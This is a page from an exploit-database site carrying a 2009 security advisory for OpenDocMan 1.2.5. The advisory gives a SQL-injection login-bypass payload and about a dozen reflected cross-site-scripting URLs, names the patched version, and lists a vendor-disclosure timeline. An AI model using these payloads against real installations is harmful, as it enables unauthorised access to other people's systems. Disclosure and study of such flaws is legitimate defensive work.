0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenDocMan 1.2.5 xss, SQL injection
[=================================== OpenDocMan 1.2.5 xss, SQL injection =================================== Security Advisory : Multiple vulnerabilities in OpenDocMan ## Overview ## -------------- OpenDocMan is a free document management system (DMS) designed to comply with ISO 17025 and OIE standard for document management. It features web based access, fine grained control of access to files, and automated install and upgrades. ## Vulnerability Description ## ----------------- OpenDocMan is vulnerable to authentication bypass and multiple cross-site scripting issues. ## Technical Details ## ------------- Vulnerable Product : OpenDocMan v1.2.5 Download : http://sourceforge.net/projects/opendocman/files/opendocman/1.2.5/opendocman-1.2.5.zip/download Authentication Bypass: ---------------------- A valid username require to carry put Auth Bypass. Default is "admin". Cross-site Scripting: --------------------- Multiple instances of Cross-site scripting found majorly due to use of $_SERVER['PHP_SELF'] in action parameter of form field and due to absence of validation for "last_message" parameter. ## Proof of concept ## ---------------------- Authentication Bypass: ---------------------- Username : admin' OR '1'='1 Password : nothing Cross-site scripting: --------------------- http://localhost/opendocman/category.php/"><script>alert(1)</script><"?aku=c3VibWl0PWFkZCZzdGF0ZT0y http://localhost/opendocman/department.php/"><script>alert(1)</script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI= http://localhost/opendocman/profile.php/"><script>alert(1)</script> http://localhost/opendocman/rejects.php/"><script>alert(1)</script> http://localhost/opendocman/search.php/"><script>alert(1)</script> http://localhost/opendocman/toBePublished.php/"><script>alert(1)</script> http://localhost/opendocman/user.php/"><script>alert(1)</script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI= http://localhost/opendocman/view_file.php/"><script>alert(1)</script><"?aku=aWQ9NiZzdGF0ZT0z http://localhost/opendocman/index.php?last_message=<script>alert(1)</script> http://localhost/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/"><script>alert(123)</script><" http://localhost/opendocman/add.php?last_message=<script>alert(1)</script> http://localhost/opendocman/toBePublished.php?last_message=<script>alert(1)</script> http://localhost/opendocman/admin.php?last_message=<script>alert(1)</script> ## Workaround ## ---------------- Update to newer version v1.2.5.2 opendocmanv1.2.5.2: http://sourceforge.net/projects/opendocman/files/opendocman/1.2.5.2/opendocman-1.2.5.2.zip/download ## TimeLine ## ---------------------- 10th Oct 2009 : Bug Discovered 12th Oct 2009 : vendor was notified by e-mail 12th Oct 2009 : Vendor response received 20th Oct 2009 : A new release publicly available 20th Oct 2009 : Public Disclosure # 0day.today [2024-11-15] #